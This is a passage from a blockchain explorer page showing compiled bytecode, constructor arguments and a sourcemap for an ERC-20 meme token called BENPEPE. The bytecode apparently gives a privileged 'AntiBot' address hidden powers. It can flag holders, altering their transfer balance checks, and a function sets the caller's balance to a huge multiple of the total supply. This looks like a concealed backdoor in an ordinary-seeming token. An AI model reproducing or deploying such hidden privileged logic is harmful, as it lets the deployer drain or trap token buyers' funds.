f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161048c565b61041f81610a21565b6003546001600160a01b0316336001600160a01b0316146105a357565b600354336001600160a01b03909116036103d6576004546105c690617530610c29565b33600090815260016020526040902055565b6001600160a01b03831661063a5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161048c565b6001600160a01b03821661069b5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161048c565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061070884846104e5565b9050600019811461077057818110156107635760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161048c565b61077084848484036105d8565b50505050565b6001600160a01b0383166107da5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161048c565b6001600160a01b03821661083c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161048c565b6001600160a01b03831660009081526001602090815260408083205460079092529091205460ff1615610892576004546001600160a01b03851660009081526001602052604090205461088f9190610c40565b90505b818110156108f15760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161048c565b6108fb8183610a71565b6001600160a01b0385166000908152600160205260408120919091556008546109329060649061092c908690610a84565b90610a90565b6001600160a01b03851660009081526001602052604090205490915061096490829061095e9086610a9c565b90610a71565b6001600160a01b0380861660008181526001602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b89087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146103d65760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161048c565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000610a7d8284610c40565b9392505050565b6000610a7d8284610c29565b6000610a7d8284610c53565b6000610a7d8284610c16565b600060208083528351808285015260005b81811015610ad557858101830151858201604001528201610ab9565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b0d57600080fd5b919050565b60008060408385031215610b2557600080fd5b610b2e83610af6565b946020939093013593505050565b600060208284031215610b4e57600080fd5b610a7d82610af6565b600080600060608486031215610b6c57600080fd5b610b7584610af6565b9250610b8360208501610af6565b9150604084013590509250925092565b60008060408385031215610ba657600080fd5b610baf83610af6565b9150610bbd60208401610af6565b90509250929050565b600181811c90821680610bda57607f821691505b602082108103610bfa57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561037857610378610c00565b808202811582820484141761037857610378610c00565b8181038181111561037857610378610c00565b600082610c7057634e487b7160e01b600052601260045260246000fd5b50049056fea26469706673582212207255f86519ab48ee1896d4fd2924c1f5a0e3666b69d9f825b6752e788d3c578664736f6c63430008130033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89000000000000000000000000000000000000000000000000000000000000000742454e5045504500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000742454e5045504500000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): BENPEPE
Arg [1] : symbol_ (string): BENPEPE
Arg [2] : AntiBot (address): 0xE11830006fe3D3A03e3e92F9494Be9211753aC89
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000e11830006fe3d3a03e3e92f9494be9211753ac89
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [4] : 42454e5045504500000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [6] : 42454e5045504500000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
9444:11081:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11198:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13501:193;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;13501:193:0;1004:187:1;10133:104:0;;;;;;:::i;:::-;-1:-1:-1;;;;;10215:14:0;10190:4;10215:14;;;:9;:14;;;;;;;;;10133:104;12298:102;12378:14;;12298:102;;;1533:25:1;;;1521:2;1506:18;12298:102:0;1387:177:1;14274:287:0;;;;;;:::i;:::-;;:::i;12148:85::-;;;12223:2;2044:36:1;;2032:2;2017:18;12148:85:0;1902:184:1;14970:238:0;;;;;;:::i;:::-;;:::i;12463:119::-;;;;;;:::i;:::-;-1:-1:-1;;;;;12556:18:0;12529:7;12556:18;;;:9;:18;;;;;;;12463:119;8623:103;;;:::i;:::-;;7973:87;8019:7;8046:6;-1:-1:-1;;;;;8046:6:0;7973:87;;;-1:-1:-1;;;;;2255:32:1;;;2237:51;;2225:2;2210:18;7973:87:0;2091:203:1;11411:98:0;;;:::i;9984:141::-;;;;;;:::i;:::-;;:::i;15711:424::-;;;;;;:::i;:::-;;:::i;12790:185::-;;;;;;:::i;:::-;;:::i;9830:146::-;;;;;;:::i;:::-;;:::i;9644:29::-;;;;;-1:-1:-1;;;;;9644:29:0;;;13038:143;;;;;;:::i;:::-;;:::i;8881:201::-;;;;;;:::i;:::-;;:::i;10349:227::-;;;:::i;11198:94::-;11244:13;11277:7;11270:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;11198:94;:::o;13501:193::-;13576:4;6848:10;13632:32;6848:10;13648:7;13657:6;13632:8;:32::i;:::-;13682:4;13675:11;;;13501:193;;;;;:::o;14274:287::-;14397:4;6848:10;14455:38;14471:4;6848:10;14486:6;14455:15;:38::i;:::-;14504:27;14514:4;14520:2;14524:6;14504:9;:27::i;:::-;-1:-1:-1;14549:4:0;;14274:287;-1:-1:-1;;;;14274:287:0:o;14970:238::-;15058:4;6848:10;15114:64;6848:10;15130:7;15167:10;15139:25;6848:10;15130:7;15139:9;:25::i;:::-;:38;;;;:::i;:::-;15114:8;:64::i;8623:103::-;7857:15;:13;:15::i;:::-;8688:30:::1;8715:1;8688:18;:30::i;:::-;8623:103::o:0;11411:98::-;11459:13;11492:9;11485:16;;;;;:::i;9984:141::-;10040:13;;6848:10;-1:-1:-1;;;;;10040:13:0;;;:29;10036:82;;-1:-1:-1;;;;;10085:14:0;;;;;;:9;:14;;;;;:21;;-1:-1:-1;;10085:21:0;10102:4;10085:21;;;10036:82;9984:141;:::o;15711:424::-;15804:4;6848:10;15804:4;15887:25;6848:10;15904:7;15887:9;:25::i;:::-;15860:52;;15951:15;15931:16;:35;;15923:85;;;;-1:-1:-1;;;15923:85:0;;3413:2:1;15923:85:0;;;3395:21:1;3452:2;3432:18;;;3425:30;3491:34;3471:18;;;3464:62;-1:-1:-1;;;3542:18:1;;;3535:35;3587:19;;15923:85:0;;;;;;;;;16036:60;16045:5;16052:7;16080:15;16061:16;:34;16036:8;:60::i;12790:185::-;12861:4;6848:10;12917:28;6848:10;12934:2;12938:6;12917:9;:28::i;9830:146::-;9890:13;;6848:10;-1:-1:-1;;;;;9890:13:0;;;:29;9886:83;;-1:-1:-1;;;;;9935:14:0;9952:5;9935:14;;;:9;:14;;;;;:22;;-1:-1:-1;;9935:22:0;;;9830:146::o;13038:143::-;-1:-1:-1;;;;;13146:18:0;;;13119:7;13146:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;13038:143::o;8881:201::-;7857:15;:13;:15::i;:::-;-1:-1:-1;;;;;8970:22:0;::::1;8962:73;;;::::0;-1:-1:-1;;;8962:73:0;;3819:2:1;8962:73:0::1;::::0;::::1;3801:21:1::0;3858:2;3838:18;;;3831:30;3897:34;3877:18;;;3870:62;-1:-1:-1;;;3948:18:1;;;3941:36;3994:19;;8962:73:0::1;3617:402:1::0;8962:73:0::1;9046:28;9065:8;9046:18;:28::i;10349:227::-:0;10409:13;;-1:-1:-1;;;;;10409:13:0;6848:10;-1:-1:-1;;;;;10393:29:0;;10389:68;;10349:227::o;10389:68::-;10471:13;;6848:10;-1:-1:-1;;;;;10471:13:0;;;:29;10467:102;;12378:14;;10542:15;;10552:5;10542:15;:::i;:::-;6848:10;10516:23;;;;:9;:23;;;;;:41;10349:227::o;19410:380::-;-1:-1:-1;;;;;19546:19:0;;19538:68;;;;-1:-1:-1;;;19538:68:0;;4399:2:1;19538:68:0;;;4381:21:1;4438:2;4418:18;;;4411:30;4477:34;4457:18;;;4450:62;-1:-1:-1;;;4528:18:1;;;4521:34;4572:19;;19538:68:0;4197:400:1;19538:68:0;-1:-1:-1;;;;;19625:21:0;;19617:68;;;;-1:-1:-1;;;19617:68:0;;4804:2:1;19617:68:0;;;4786:21:1;4843:2;4823:18;;;4816:30;4882:34;4862:18;;;4855:62;-1:-1:-1;;;4933:18:1;;;4926:32;4975:19;;19617:68:0;4602:398:1;19617:68:0;-1:-1:-1;;;;;19698:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19750:32;;1533:25:1;;;19750:32:0;;1506:18:1;19750:32:0;;;;;;;19410:380;;;:::o;20081:441::-;20216:24;20243:25;20253:5;20260:7;20243:9;:25::i;:::-;20216:52;;-1:-1:-1;;20283:16:0;:37;20279:236;;20365:6;20345:16;:26;;20337:68;;;;-1:-1:-1;;;20337:68:0;;5207:2:1;20337:68:0;;;5189:21:1;5246:2;5226:18;;;5219:30;5285:31;5265:18;;;5258:59;5334:18;;20337:68:0;5005:353:1;20337:68:0;20441:51;20450:5;20457:7;20485:6;20466:16;:25;20441:8;:51::i;:::-;20205:317;20081:441;;;:::o;16632:751::-;-1:-1:-1;;;;;16769:24:0;;16761:74;;;;-1:-1:-1;;;16761:74:0;;5565:2:1;16761:74:0;;;5547:21:1;5604:2;5584:18;;;5577:30;5643:34;5623:18;;;5616:62;-1:-1:-1;;;5694:18:1;;;5687:35;5739:19;;16761:74:0;5363:401:1;16761:74:0;-1:-1:-1;;;;;16854:16:0;;16846:64;;;;-1:-1:-1;;;16846:64:0;;5971:2:1;16846:64:0;;;5953:21:1;6010:2;5990:18;;;5983:30;6049:34;6029:18;;;6022:62;-1:-1:-1;;;6100:18:1;;;6093:33;6143:19;;16846:64:0;5769:399:1;16846:64:0;-1:-1:-1;;;;;16938:21:0;;16921:15;16938:21;;;:9;:21;;;;;;;;;16974:9;:21;;;;;;;;;:30;16970:105;;12378:14;;-1:-1:-1;;;;;17030:21:0;;;;;;:9;:21;;;;;;:33;;;;:::i;:::-;17021:42;;16970:105;17106:6;17095:7;:17;;17087:68;;;;-1:-1:-1;;;17087:68:0;;6508:2:1;17087:68:0;;;6490:21:1;6547:2;6527:18;;;6520:30;6586:34;6566:18;;;6559:62;-1:-1:-1;;;6637:18:1;;;6630:36;6683:19;;17087:68:0;6306:402:1;17087:68:0;17190:19;:7;17202:6;17190:11;:19::i;:::-;-1:-1:-1;;;;;17166:21:0;;;;;;:9;:21;;;;;:43;;;;17247:6;;17236:27;;17259:3;;17236:18;;:6;;:10;:18::i;:::-;:22;;:27::i;:::-;-1:-1:-1;;;;;17291:13:0;;;;;;:9;:13;;;;;;17220:43;;-1:-1:-1;17291:36:0;;17220:43;;17291:25;;17309:6;17291:17;:25::i;:::-;:29;;:36::i;:::-;-1:-1:-1;;;;;17274:13:0;;;;;;;:9;:13;;;;;;;:53;;;;17343:32;;;;;;;;;;17368:6;1533:25:1;;1521:2;1506:18;;1387:177;17343:32:0;;;;;;;;16750:633;;16632:751;;;:::o;8138:134::-;8019:7;8046:6;-1:-1:-1;;;;;8046:6:0;6848:10;8204:23;8196:68;;;;-1:-1:-1;;;8196:68:0;;6915:2:1;8196:68:0;;;6897:21:1;;;6934:18;;;6927:30;6993:34;6973:18;;;6966:62;7045:18;;8196:68:0;6713:356:1;9242:191:0;9316:16;9335:6;;-1:-1:-1;;;;;9352:17:0;;;-1:-1:-1;;;;;;9352:17:0;;;;;;9385:40;;9335:6;;;;;;;9385:40;;9316:16;9385:40;9305:128;9242:191;:::o;2964:98::-;3022:7;3049:5;3053:1;3049;:5;:::i;:::-;3042:12;2964:98;-1:-1:-1;;;2964:98:0:o;3321:::-;3379:7;3406:5;3410:1;3406;:5;:::i;3720:98::-;3778:7;3805:5;3809:1;3805;:5;:::i;2583:98::-;2641:7;2668:5;2672:1;2668;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1196:186::-;1255:6;1308:2;1296:9;1287:7;1283:23;1279:32;1276:52;;;1324:1;1321;1314:12;1276:52;1347:29;1366:9;1347:29;:::i;1569:328::-;1646:6;1654;1662;1715:2;1703:9;1694:7;1690:23;1686:32;1683:52;;;1731:1;1728;1721:12;1683:52;1754:29;1773:9;1754:29;:::i;:::-;1744:39;;1802:38;1836:2;1825:9;1821:18;1802:38;:::i;:::-;1792:48;;1887:2;1876:9;1872:18;1859:32;1849:42;;1569:328;;;;;:::o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:127::-;3010:10;3005:3;3001:20;2998:1;2991:31;3041:4;3038:1;3031:15;3065:4;3062:1;3055:15;3081:125;3146:9;;;3167:10;;;3164:36;;;3180:18;;:::i;4024:168::-;4097:9;;;4128;;4145:15;;;4139:22;;4125:37;4115:71;;4166:18;;:::i;6173:128::-;6240:9;;;6261:11;;;6258:37;;;6275:18;;:::i;7074:217::-;7114:1;7140;7130:132;;7184:10;7179:3;7175:20;7172:1;7165:31;7219:4;7216:1;7209:15;7247:4;7244:1;7237:15;7130:132;-1:-1:-1;7276:9:1;;7074:217::o
Swarm Source
ipfs://7255f86519ab48ee1896d4fd2924c1f5a0e3666b69d9f825b6752e788d3c5786
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.